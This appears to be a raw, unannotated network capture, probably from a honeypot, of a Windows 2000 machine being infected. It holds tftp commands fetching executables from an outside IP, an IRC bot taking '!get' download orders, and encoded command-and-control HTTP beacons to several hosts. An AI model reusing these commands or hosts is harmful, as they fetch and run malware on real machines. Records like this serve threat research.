Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 175.112.215.240 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 175.112.215.240 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29184 bytes in 13 seconds, 2244 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 175.112.215.240 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 10 seconds, 1996 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK vailqkvjUSER g020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG vailqkvj :!get http:/210.83.81.173:88/nmb.exe:u. PRIVMSG vailqkvj :!get http:/tyui89.com/08d.txt:u. PRIVMSG vailqkvj :!get http:/tyui89.com/temp/fast.exe 
VICTIM:  	GET /nmb.exe HTTP/1.0User-Agent: DownloadHost: 210.83.81.173:88Pragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5C74322&v=2&t=0.2856867 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /a8.txt?t=0.9882013 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 122.224.18.20:88Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /a8.txt?t=0.9882013 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 122.224.18.20:88Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=6B75C92D36A68A2B2CC01739D19662DCE07E84EC32168910D1B4BCFDA27B2E75443F869F1F756A5EB78AF698B9A81B0266A8E45C3C53EFBA14769C390F74BFCE0754D7715C891F80556FEB91719F33EC5EA93E036719C3C59A38006D01F8921695CD1A3AD6FBEC5C378461E6B3B37FE549BE103F3B7C6B4C356C751AD0669C220D09EA43B79858E7CFFA075076B41468&t=0.9961969 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=A8B6AC48AA3AFC5DD438D6F865226AD4F6686E06DFFB70E9C2A7A9E88E5782D9730828319EF4E7D3BC811D738A9B051C02CCB008EA85DF8AC8AAA1048BF0DCAD6B382E88C510CA550F35374D09E722FDD92EA09DBAC48E885EFCF79A3EC7A82C5C045777547905B5A81B8C1AA85172FA689D7729A4F77D4F8296B4C18A2838C254447BD3C0F039FCA695C4926AA9E561DD03&t=0.820965 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /mstrz.jpg?t=8.726138E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 58.150.174.222Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=1F0102E694041BBB01EE4B61296E50A4CA03FCC9391FF268A99F511BA572B29D99E22A3D573D2515F1CD57CD756721CC37FD12A8DA446A3A3606CDB4C6BF8EFD502C2F8BD40C0D92152F59232DC3BD6213E46D50FC826D6BF052513C21D8C94DB7EFB0902A077DCD70C342C57F7F9E04F3044E61DC9B4562FDA46D0205B37DC384829039B5805F99487C4414D7117BFA&t=9.977359E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=A7B94EAAB020B919876812387E3942B6539AB683BE9841DB596FE0AACC1BB49B6A11AEB99FF5C3F3DEE2A73DF1E354B9D913F248A03EDA8ACDFDC5BC552C6D1E403C218563BB20BFD0EABDC7F21C8F5074833F025C22B7B104A6B2DFD72E0B8FFCA435155578C3737CCFF066A85178F094614D13EAB9EEDCBFAB64111CBE30CAADBDB6110D39E32146721F467DBCD4A8EB37&t=0.114422 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 210.83.81.173:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :j. 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :j. 
VICTIM:  	JOIN &virtu